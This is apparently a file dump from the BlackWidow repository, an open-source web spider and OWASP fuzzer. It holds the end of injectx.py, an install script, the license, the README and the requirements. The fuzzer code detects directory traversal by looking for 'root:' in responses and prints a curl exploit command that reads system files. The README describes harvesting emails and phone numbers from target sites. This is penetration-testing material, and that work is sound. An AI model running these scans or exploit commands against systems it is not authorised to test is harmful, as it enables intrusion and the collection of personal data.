                print(COLOR2 + "[i] New URL: " + traversal_url + " [" + OKRED + str(http_status) + COLOR2 + "]" + " [" + COLOR3 + str(http_length) + COLOR2 + "]" + " [" + COLOR1 + http_length_diff + COLOR2 + "]" + RESET)

            if "root:" in http_response:
                print(OKRED + "[+] Linux Directory Traversal Found! " + RESET)
                print(OKRED + "[+] Vulnerable URL: " + traversal_url + RESET)
                print(OKGREEN + "[c] Exploit Command: curl -s '" + traversal_url + "' | egrep root --color=auto") + RESET
                f.write("P2 - HIGH, Directory Traversal, " + str(traversal_url) + ", " + str(traversal_exploit) + "\n")

        except:
            pass

print(OKORANGE + "______________________________________________________________________________________________________" + RESET)
print(RESET)
print(RESET)
f.close()
[FILE_END] injectx.py

[FILE_START] install.sh
meta: lang=sh size=1540
#!/usr/bin/env bash
# Install script for blackwidow & injectx fuzzer
# Crated by @xer0dayz - https://sn1persecurity.com

OKBLUE='\033[94m'
OKRED='\033[91m'
OKGREEN='\033[92m'
OKORANGE='\033[93m'
RESET='\e[0m'

echo -e "$OKRED $RESET"
echo -e "$OKRED $RESET"
echo -e "$OKRED                  _.._$RESET"
echo -e "$OKRED                .'    '.$RESET"
echo -e "$OKRED               /   __   \ $RESET"
echo -e "$OKRED            ,  |   ><   |  ,$RESET"
echo -e "$OKRED           . \  \      /  / .$RESET"
echo -e "$OKRED            \_'--\`(  )'--'_/$RESET"
echo -e "$OKRED              .--'/()\'--.$RESET"
echo -e "$OKRED  @xer0dayz  /  /\` '' \`\  \ $RESET"
echo -e "$OKRED               |        |$RESET"
echo -e "$OKRED                \      /$RESET"
echo -e "$OKRED $RESET"
echo ""
echo -e "$OKRED + -- --=[ https://sn1persecurity.com $RESET"
echo -e "$OKRED + -- --=[ blackwidow by @xer0dayz $RESET"
echo ""

echo -e "$OKBLUE[*]$RESET Installing BlackWidow... $RESET"
apt update
apt install -y python3 python3-requests python3-pip python3-lxml python3-requests openssl ca-certificates python3-dev wget git
cp -f $PWD/blackwidow /usr/bin/blackwidow
cp -f $PWD/injectx.py /usr/bin/injectx.py
cp -f $PWD/blackwidow.desktop /usr/share/applications/ 2> /dev/null
cp -f $PWD/blackwidow.desktop /usr/share/applications/blackwidow.desktop 2> /dev/null
cp -f $PWD/blackwidow.desktop /usr/share/kali-menu/applications/blackwidow.desktop2> /dev/null
echo -e "$OKBLUE[*]$RESET Done! $RESET"
echo -e "$OKRED[>]$RESET To run, type 'blackwidow'! $RESET"
[FILE_END] install.sh

[FILE_START] LICENSE.md
meta: lang=md size=275
## LICENSE:
You may modify and re-distribute this software as long as the project name "BlackWidow", credit to the author "xer0dayz" and website URL "https://sn1persecurity.com" are NOT mofified. Doing so will break the license agreement and a takedown notice will be issued.
[FILE_END] LICENSE.md

[FILE_START] README.md
meta: lang=md size=2756
![alt tag](https://github.com/1N3/BlackWidow/blob/master/blackwidowlogo.png)

## ABOUT:
BlackWidow is a python based web application spider to gather subdomains, URL's, dynamic parameters, email addresses and phone numbers from a target website. This project also includes Inject-X fuzzer to scan dynamic URL's for common OWASP vulnerabilities.

## DEMO VIDEO:
[![BlackWidow Demo](https://i.ytimg.com/vi/mch8ht47taY/hqdefault.jpg)](https://www.youtube.com/watch?v=mch8ht47taY)

## FEATURES:
- [x] Automatically collect all URL's from a target website
- [x] Automatically collect all dynamic URL's and parameters from a target website
- [x] Automatically collect all subdomains from a target website
- [x] Automatically collect all phone numbers from a target website
- [x] Automatically collect all email addresses from a target website
- [x] Automatically collect all form URL's from a target website
- [X] Automatically scan/fuzz for common OWASP TOP vulnerabilities
- [x] Automatically saves all data into sorted text files

## LINUX INSTALL:
```
sudo bash install.sh
```

## USAGE:
```
blackwidow -u https://target.com - crawl target.com with 3 levels of depth.
blackwidow -d target.com -l 5 -v y - crawl the domain: target.com with 5 levels of depth with verbose logging enabled.
blackwidow -d target.com -l 5 -c 'test=test' - crawl the domain: target.com with 5 levels of depth using the cookie 'test=test'
blackwidow -d target.com -l 5 -s y -v y - crawl the domain: target.com with 5 levels of depth and fuzz all unique parameters for OWASP vulnerabilities with verbose logging on.
injectx.py -u https://test.com/uers.php?user=1&admin=true -v y - Fuzz all GET parameters for common OWASP vulnerabilities with verbose logging enabled.
```

## SAMPLE REPORT:
![alt tag](https://github.com/1N3/BlackWidow/blob/master/blackwidow-report1.png)

## DOCKER:
```bash
git clone https://github.com/1N3/BlackWidow.git
cd BlackWidow
docker build -t blackwidow .
docker run -it blackwidow # Defaults to --help

```

## LICENSE:
You may modify and re-distribute this software as long as the project name "BlackWidow", credit to the author "xer0dayz" and website URL "https://sn1persecurity.com" are NOT mofified. Doing so will break the license agreement and a takedown notice will be issued. 

## DISCLAIMER:
This program is used for educational and ethical purposes only. I take no responsibility for any damages caused from using this program. By downloading and using this software, you agree that you take full responsibility for any damages and liability.

## LINKS:
- [Twitter](https://www.twitter.com/xer0dayz "Personal Twitter")
- [Twitter](https://www.twitter.com/sn1persecurity "Company Twitter")
- [Website](https://sn1persecurity.com "Sn1perSecurity")
[FILE_END] README.md

[FILE_START] requirements.txt
meta: lang=txt size=56
coloredlogs
beautifulsoup4
requests
lxml
cookies
urllib3
[FILE_END] requirements.txt

